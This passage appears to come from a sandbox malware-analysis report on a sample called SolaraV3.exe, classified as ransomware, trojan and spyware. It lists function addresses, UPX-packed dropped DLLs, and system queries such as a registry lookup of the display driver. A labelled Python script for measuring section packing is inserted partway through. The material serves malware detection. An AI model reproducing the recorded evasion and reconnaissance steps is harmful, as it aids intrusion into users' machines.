Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81474B 2_2_00007FFB0B81474B
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B811B36 2_2_00007FFB0B811B36
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B83B550 2_2_00007FFB0B83B550
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0C35B360 2_2_00007FFB0C35B360
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0C35168B 2_2_00007FFB0C35168B
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0C3520B3 2_2_00007FFB0C3520B3
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0C3B0B50 2_2_00007FFB0C3B0B50
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0C356BA0 2_2_00007FFB0C356BA0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0C351537 2_2_00007FFB0C351537
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0C351DD4 2_2_00007FFB0C351DD4
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0C35195B 2_2_00007FFB0C35195B
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0C3A0240 2_2_00007FFB0C3A0240
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0C3B8460 2_2_00007FFB0C3B8460
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0C352572 2_2_00007FFB0C352572
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFAA9470FDD 14_2_00007FFAA9470FDD
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE9AE10 110_2_00007FF74EE9AE10
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE7ABA0 110_2_00007FF74EE7ABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEA7B24 110_2_00007FF74EEA7B24
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE80A2C 110_2_00007FF74EE80A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE71884 110_2_00007FF74EE71884
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE7B540 110_2_00007FF74EE7B540
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE854C0 110_2_00007FF74EE854C0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE81180 110_2_00007FF74EE81180
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE782F0 110_2_00007FF74EE782F0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEAC00C 110_2_00007FF74EEAC00C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEB4FE8 110_2_00007FF74EEB4FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEDDFD8 110_2_00007FF74EEDDFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEDAF90 110_2_00007FF74EEDAF90
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEA5F4C 110_2_00007FF74EEA5F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE90104 110_2_00007FF74EE90104
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EED00F0 110_2_00007FF74EED00F0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEA0074 110_2_00007FF74EEA0074
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE9C05C 110_2_00007FF74EE9C05C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEA8040 110_2_00007FF74EEA8040
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE83030 110_2_00007FF74EE83030
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE7EE08 110_2_00007FF74EE7EE08
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE81E04 110_2_00007FF74EE81E04
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEC1DCC 110_2_00007FF74EEC1DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEB9D74 110_2_00007FF74EEB9D74
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEA0D20 110_2_00007FF74EEA0D20
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEAAF0C 110_2_00007FF74EEAAF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE79EFC 110_2_00007FF74EE79EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEBEEA4 110_2_00007FF74EEBEEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE7CE84 110_2_00007FF74EE7CE84
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EECFE74 110_2_00007FF74EECFE74
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE88E68 110_2_00007FF74EE88E68
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEBAE50 110_2_00007FF74EEBAE50
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEC9B98 110_2_00007FF74EEC9B98
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEB4B38 110_2_00007FF74EEB4B38
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE99D0C 110_2_00007FF74EE99D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEC6D0C 110_2_00007FF74EEC6D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE7DD04 110_2_00007FF74EE7DD04
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEB5C8C 110_2_00007FF74EEB5C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE88C30 110_2_00007FF74EE88C30
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEB69FD 110_2_00007FF74EEB69FD
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE749B8 110_2_00007FF74EE749B8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE9D97C 110_2_00007FF74EE9D97C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEAD91C 110_2_00007FF74EEAD91C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE7CB14 110_2_00007FF74EE7CB14
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEDAAC0 110_2_00007FF74EEDAAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEB5A70 110_2_00007FF74EEB5A70
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEAFA6C 110_2_00007FF74EEAFA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE967E0 110_2_00007FF74EE967E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE817C8 110_2_00007FF74EE817C8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEB190C 110_2_00007FF74EEB190C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEA0904 110_2_00007FF74EEA0904
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEA38E8 110_2_00007FF74EEA38E8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEC18A8 110_2_00007FF74EEC18A8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE82890 110_2_00007FF74EE82890
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE78884 110_2_00007FF74EE78884
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEC260C 110_2_00007FF74EEC260C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEA65FC 110_2_00007FF74EEA65FC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE9F5B0 110_2_00007FF74EE9F5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE88598 110_2_00007FF74EE88598
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEAF59C 110_2_00007FF74EEAF59C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEAA710 110_2_00007FF74EEAA710
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEB0710 110_2_00007FF74EEB0710
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEB2700 110_2_00007FF74EEB2700
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EED86D4 110_2_00007FF74EED86D4
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE886C4 110_2_00007FF74EE886C4
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEC7660 110_2_00007FF74EEC7660
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE9C3E0 110_2_00007FF74EE9C3E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEA0374 110_2_00007FF74EEA0374
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE82360 110_2_00007FF74EE82360
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEC832C 110_2_00007FF74EEC832C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE7A504 110_2_00007FF74EE7A504
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEB5468 110_2_00007FF74EEB5468
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE9D458 110_2_00007FF74EE9D458
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EED41CC 110_2_00007FF74EED41CC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEB81CC 110_2_00007FF74EEB81CC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEB2164 110_2_00007FF74EEB2164
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEC1314 110_2_00007FF74EEC1314
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE742E0 110_2_00007FF74EE742E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE8D2C0 110_2_00007FF74EE8D2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEB02A4 110_2_00007FF74EEB02A4
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEC2268 110_2_00007FF74EEC2268
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE7F24C 110_2_00007FF74EE7F24C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE97244 110_2_00007FF74EE97244
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE8E21C 110_2_00007FF74EE8E21C
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: String function: 00007FFB0B8124BE appears 84 times
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: String function: 00007FFB0B814840 appears 129 times
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: String function: 00007FF6DC702710 appears 104 times
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: String function: 00007FFB0B811EF6 appears 1581 times
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: String function: 00007FFB0C3512EE appears 293 times
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: String function: 00007FF6DC702910 appears 34 times
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: String function: 00007FFB0B812739 appears 516 times
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: String function: 00007FFB0C3BDFBF appears 88 times
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: String function: 00007FFB0B814D6D appears 34 times
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: String function: 00007FFB0B813012 appears 55 times
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: String function: 00007FFB0B81698D appears 49 times
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: String function: 00007FFB0B81688E appears 31 times
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: String function: 00007FFB0C3BE055 appears 63 times
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: String function: 00007FFB0B812A09 appears 172 times
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: String function: 00007FFB0B81405C appears 780 times
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: String function: 00007FF74EE88444 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: String function: 00007FF74EEB49F4 appears 53 times
Source: SolaraV3.exe Static PE information: invalid certificate
Source: rar.exe.1.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.1.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: SolaraV3.exe Binary or memory string: OriginalFilename vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1559590237.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesqlite3.dll0 vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000000.1559321077.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamektmutil.exej% vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_sqlite3.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_decimal.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibsslH vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs SolaraV3.exe
Source: SolaraV3.exe Binary or memory string: OriginalFilename vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2052833376.00007FFB1AB18000.00000004.00000001.01000000.0000000C.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmp Binary or memory string: OriginalFilenamelibcryptoH vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2050822213.00007FFB0C43D000.00000004.00000001.01000000.0000000E.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2051568182.00007FFB0C5EB000.00000004.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2053258667.00007FFB1BB2E000.00000004.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilename_sqlite3.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2050061158.00007FFB0BFE8000.00000004.00000001.01000000.00000004.sdmp Binary or memory string: OriginalFilenamepython310.dll. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2051838761.00007FFB0C613000.00000004.00000001.01000000.00000006.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2053545569.00007FFB1C267000.00000004.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmp Binary or memory string: OriginalFilenamelibsslH vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2052222811.00007FFB18B84000.00000004.00000001.01000000.00000011.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2054325875.00007FFB1E4CC000.00000004.00000001.01000000.0000000D.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000000.1564954986.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamektmutil.exej% vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2053814093.00007FFB1C3C7000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2054068816.00007FFB1E47C000.00000004.00000001.01000000.00000012.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2047749339.00007FFB0B807000.00000004.00000001.01000000.00000013.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2051258231.00007FFB0C5B7000.00000004.00000001.01000000.0000000B.sdmp Binary or memory string: OriginalFilenamesqlite3.dll0 vs SolaraV3.exe
Source: SolaraV3.exe Binary or memory string: OriginalFilenamektmutil.exej% vs SolaraV3.exe
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3615
Source: libcrypto-1_1.dll.1.dr Static PE information: Section: UPX1 ZLIB complexity 0.9983946492448331
Source: libssl-1_1.dll.1.dr Static PE information: Section: UPX1 ZLIB complexity 0.9922997485632183
Source: python310.dll.1.dr Static PE information: Section: UPX1 ZLIB complexity 0.9992644702528288
Source: sqlite3.dll.1.dr Static PE information: Section: UPX1 ZLIB complexity 0.9976026860367893
Source: unicodedata.pyd.1.dr Static PE information: Section: UPX1 ZLIB complexity 0.9937050102833638
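The UPX1 entries above report a ZLIB complexity close to 1.0 for every dropped DLL, meaning the section bodies do not compress any further, which is what packed or encrypted payloads look like. The Python script below is an added example, not part of the Joe Sandbox report or of the sample: it walks a PE section table with the standard library only and reproduces that metric as compressed size over raw size (an assumption about how the column is computed), flagging sections above a threshold. build_synthetic_image() constructs a two-section PE-shaped test blob so the script runs offline; pass a real file path on the command line to inspect a dropped binary instead.

```python
import hashlib
import struct
import zlib


def zlib_complexity(data: bytes) -> float:
    """Compressed-size / raw-size ratio. Values near 1.0 mean the bytes are already
    compressed, encrypted or packed (assumed here to be what the report's
    'ZLIB complexity' column measures)."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def pe_sections(image: bytes):
    """Walk the PE section table with stdlib only; yields (name, raw_bytes)."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", image, coff + 2)[0]    # NumberOfSections
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]     # SizeOfOptionalHeader
    table = coff + 20 + opt_size                                 # section table follows the optional header
    for i in range(n_sections):
        off = table + 40 * i                                     # IMAGE_SECTION_HEADER is 40 bytes
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", image, off + 8)
        yield name, image[raw_ptr:raw_ptr + raw_size]


def packed_sections(image: bytes, threshold: float = 0.98):
    """Return [(name, ratio)] for sections whose contents do not compress further."""
    flagged = []
    for name, data in pe_sections(image):
        ratio = zlib_complexity(data)
        if ratio >= threshold:
            flagged.append((name, round(ratio, 4)))
    return flagged


def build_synthetic_image() -> bytes:
    """Constructed two-section PE-shaped blob for offline testing; it has no optional
    header and is not executable. UPX1 holds pseudo-random (incompressible) bytes,
    .rsrc holds zeros."""
    rnd = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))  # 4096 bytes
    zeros = b"\0" * 4096
    hdr = bytearray(0x200)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                 # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HH", hdr, 0x44, 0x8664, 2)           # Machine, NumberOfSections
    struct.pack_into("<H", hdr, 0x44 + 16, 0)               # SizeOfOptionalHeader
    table = 0x44 + 20
    for i, (name, data) in enumerate(((b"UPX1", rnd), (b".rsrc", zeros))):
        off = table + 40 * i
        hdr[off:off + 8] = name.ljust(8, b"\0")
        struct.pack_into("<IIII", hdr, off + 8,
                         len(data), 0x1000 * (i + 1),       # VirtualSize, VirtualAddress
                         len(data), 0x200 + 0x1000 * i)     # SizeOfRawData, PointerToRawData
    return bytes(hdr) + rnd + zeros


if __name__ == "__main__":
    import sys
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_synthetic_image()
    for name, ratio in packed_sections(image):
        print(f"{name:8s} zlib complexity {ratio}")
```

A high ratio on its own only says the bytes are high-entropy; combined with a section name like UPX1 and a tiny .text it is a strong packing indicator, and the unpacked DLL (UPX is trivially unpacked with upx -d when the headers are intact) is what should be hashed and compared against the legitimate python310.dll / libssl-1_1.dll builds.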
Source: classification engine Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@199/58@4/3
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE8CAFC GetLastError,FormatMessageW, 110_2_00007FF74EE8CAFC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE8EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 110_2_00007FF74EE8EF50
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEBB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx, 110_2_00007FF74EEBB57C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE93144 GetDiskFreeSpaceExW, 110_2_00007FF74EE93144
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4664:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3040:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4252:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
